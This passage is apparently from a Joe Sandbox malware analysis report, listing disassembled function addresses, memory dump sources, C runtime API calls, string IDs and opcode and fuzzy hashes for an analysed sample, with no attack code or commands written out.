                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 9a5b07d50968f5a5a33a42041e89df66e587ce4be2ee540ab80df64da2c54726
                                                                  • Instruction ID: de8a4150e3e2cf68bf20060b1f27a299a51b9094292f0d72657fac800c709e29
                                                                  • Opcode Fuzzy Hash: 9a5b07d50968f5a5a33a42041e89df66e587ce4be2ee540ab80df64da2c54726
                                                                  • Instruction Fuzzy Hash: 085117B2D041149BF7208B25DC45BFB7B79EF80310F1542BAE84DA2680E23D5AC5CB66
                                                                  Function 0040C0A9 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 176COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ?4:Z$L$L$W$a$a$b$d$i$o$r$r$y
                                                                  • API String ID: 0-178481897
                                                                  • Opcode ID: 2d0078a4e1718066b6bd25370331ff6b2c29aae98de2e60b0c2fda70ab3628cd
                                                                  • Instruction ID: 9e29478c6255eedc6371b7b31605b7cf1d6ab259d432597406e054186138c5f6
                                                                  • Opcode Fuzzy Hash: 2d0078a4e1718066b6bd25370331ff6b2c29aae98de2e60b0c2fda70ab3628cd
                                                                  • Instruction Fuzzy Hash: CA5167A1D082949AF7218724DC417EB7A39DF90710F1481FED44D67681E6BE0FC68B27
                                                                  Function 00415744 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 75memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapSetInformation.KERNEL32(?,00000001), ref: 00415749
                                                                  • _fast_error_exit.LIBCMT ref: 004157A3
                                                                    • Part of subcall function 004156FB: __FF_MSGBANNER.LIBCMT ref: 00415709
                                                                    • Part of subcall function 004156FB: __NMSG_WRITE.LIBCMT ref: 00415711
                                                                  • _fast_error_exit.LIBCMT ref: 004157B4
                                                                  • __amsg_exit.LIBCMT ref: 004157CD
                                                                  • GetCommandLineW.KERNEL32(?,00000001), ref: 004157D3
                                                                  • __wsetargv.LIBCMT ref: 004157E8
                                                                  • __amsg_exit.LIBCMT ref: 004157F3
                                                                  • __wsetenvp.LIBCMT ref: 004157F9
                                                                  • __amsg_exit.LIBCMT ref: 00415804
                                                                  • __cinit.LIBCMT ref: 0041580C
                                                                  • __amsg_exit.LIBCMT ref: 00415817
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: __amsg_exit$_fast_error_exit$CommandHeapInformationLine__cinit__wsetargv__wsetenvp
                                                                  • String ID: YSl$Yrh$W
                                                                  • API String ID: 495375042-3553233420
                                                                  • Opcode ID: 177d833bc692cd9b4f54a7efe97807f3b95ddf99724db6f4f477688eaf1752a8
                                                                  • Instruction ID: 3ad2514ef2d4a8fb3d4db0986c40aef22871cecf875f56b9d18474f28f6ced5d
                                                                  • Opcode Fuzzy Hash: 177d833bc692cd9b4f54a7efe97807f3b95ddf99724db6f4f477688eaf1752a8
                                                                  • Instruction Fuzzy Hash: AD21D230A88714D6EB2477B29D877EE26746F40708F10402FFC25A91C2EFBC84C19A6E
                                                                  Function 0040C166 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                  • API String ID: 0-4069139063
                                                                  • Opcode ID: 7ecc125851947807b28881be17fe346295ce7e30f9f6791f6214aa20b03f0186
                                                                  • Instruction ID: 1fd2a57ec42fc069f9c9e6eb1f30a52e5e8cd407d5f5db1c86275cac6f09bb00
                                                                  • Opcode Fuzzy Hash: 7ecc125851947807b28881be17fe346295ce7e30f9f6791f6214aa20b03f0186
                                                                  • Instruction Fuzzy Hash: 30415AE2C08184DEF7218224DC457EB7B79DBD1714F1881FED44D25A82D67E1BCA8A27
                                                                  Function 0040CCC2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID: P
                                                                  • API String ID: 621844428-3110715001
                                                                  • Opcode ID: dfd3e73e43fb0de9aa0ebd2d874d64beb031c13ca9690b4ffd0a0cb83bbd051a
                                                                  • Instruction ID: fd9b133df32bb7292ee0a0534e24d5bbfc4e221d87805b7341f3c622169aad27
                                                                  • Opcode Fuzzy Hash: dfd3e73e43fb0de9aa0ebd2d874d64beb031c13ca9690b4ffd0a0cb83bbd051a
                                                                  • Instruction Fuzzy Hash: 24E0D83190C2559EF3A00B24DC9C79FBF7CDB42714F5000B7D50AD60C1CB7D4A869912
                                                                  Function 0040C3BD Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4392ff6410eed9a53257134b9d64f32b32a4d3fbdded8eed35061b62c0e99df3
                                                                  • Instruction ID: f56dd8d996ad5540ce26c9d5e4b3da27ddda79bf98cd93287bba5281d932ca75
                                                                  • Opcode Fuzzy Hash: 4392ff6410eed9a53257134b9d64f32b32a4d3fbdded8eed35061b62c0e99df3
                                                                  • Instruction Fuzzy Hash: BA5128B2D041249BF7208B28DC557FBBB79FF80314F1541BAD84DA2280E2396EC5CB56
                                                                  Function 0040C552 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4e0a38a36bb4056de32b79133cdefca6493cf2fe5669affa6d2f72c301395a41
                                                                  • Instruction ID: 2c86de2936023d7158f63331d5a9febbe6d24f8d877cb46424d984690f9e0703
                                                                  • Opcode Fuzzy Hash: 4e0a38a36bb4056de32b79133cdefca6493cf2fe5669affa6d2f72c301395a41
                                                                  • Instruction Fuzzy Hash: 6B41E0B6D041249AE7248B15DC847FBB679EF90314F1482BBE80D76280E23D6FC1CB66
                                                                  Function 0040C56E Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: fc5cc2c6824b824c517dab8f29adb0fe622315edf1c1d8e05acc000b182b4f04
                                                                  • Instruction ID: 367724127f3c5f72d6283c2e13d15ea392774b1bba65878750058da6416fddd6
                                                                  • Opcode Fuzzy Hash: fc5cc2c6824b824c517dab8f29adb0fe622315edf1c1d8e05acc000b182b4f04
                                                                  • Instruction Fuzzy Hash: 3911D362D14124ABF7204A16DC857EB7A79EB80725F1542BBD90D761C0E27C1FC1CA62
                                                                  Function 0040C587 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: cef30995ae083f6fffe8e35d35d45c0faf8d082ef79d84690cd91c51c66baa61
                                                                  • Instruction ID: 786c12c4dc23d80fc4d29d01d52a1b7e18d14177999a8bbab94840f6d880f48f
                                                                  • Opcode Fuzzy Hash: cef30995ae083f6fffe8e35d35d45c0faf8d082ef79d84690cd91c51c66baa61
                                                                  • Instruction Fuzzy Hash: 9E11E762E00024ABF7204A16DC447EBBB79EBC1725F1442BBD84D751C0E77C1BC2C951
                                                                  Function 0040C676 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: d31ced8267479b584ffb8388a0bfab396d1382cbc9d5f63c5d446b4e000f7a80
                                                                  • Instruction ID: f34ffc79aea0e517d4c31c4da36d93f25ff8cfaaf4e22df9459f5a6363e89d26
                                                                  • Opcode Fuzzy Hash: d31ced8267479b584ffb8388a0bfab396d1382cbc9d5f63c5d446b4e000f7a80
                                                                  • Instruction Fuzzy Hash: CEF059A3D041049AF7500A38DC0DBFB2A3CEBC0719F0541BBE80DA91C0E77D4ACA8826
                                                                  Function 0040C2E8 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
